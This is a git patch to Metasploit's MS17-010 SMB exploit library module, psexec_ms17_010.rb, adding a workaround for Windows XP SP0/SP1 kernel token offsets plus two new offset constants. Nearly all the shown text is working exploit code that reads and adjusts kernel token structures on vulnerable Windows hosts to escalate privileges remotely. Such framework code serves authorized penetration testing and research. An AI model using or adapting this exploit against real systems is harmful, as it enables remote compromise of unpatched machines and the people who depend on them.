From 7007bc1444d9c4bc40763ede6c1a64520d96867b Mon Sep 17 00:00:00 2001
From: zerosum0x0 <zerosum0x0@gmail.com>
Date: Mon, 29 Jan 2018 19:11:30 -0700
Subject: [PATCH] hopefully fixed XP SP0/SP1 issues

---
 .../exploit/smb/client/psexec_ms17_010.rb     | 21 ++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
index 0ec45aecdc..57962c1f23 100644
--- a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
+++ b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
@@ -124,6 +124,23 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
 
       userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
       userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
+
+      if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
+        if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+          print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
+          @ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+          @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+
+          userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
+          userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
+
+          # hopefully its not bad anymore
+          if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+            raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
+          end
+        end
+      end
+
       vprint_status("UserAndGroupCount: 0x#{userAndGroupCount.to_s}")
       vprint_status("UserAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")
 
@@ -183,7 +200,7 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
 
   def read_data(read_addr, read_size)
     if read_addr == 0
-      raise MS17_010_Error, 'Attempted to read from a NULL pointer!'      
+      raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
     end
 
     fmt = @ctx['PTR_FMT']
@@ -1190,6 +1207,8 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
       'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
       'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
       'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
+      'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
+      'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
     }
 
     WIN2K_32_SESSION_INFO = {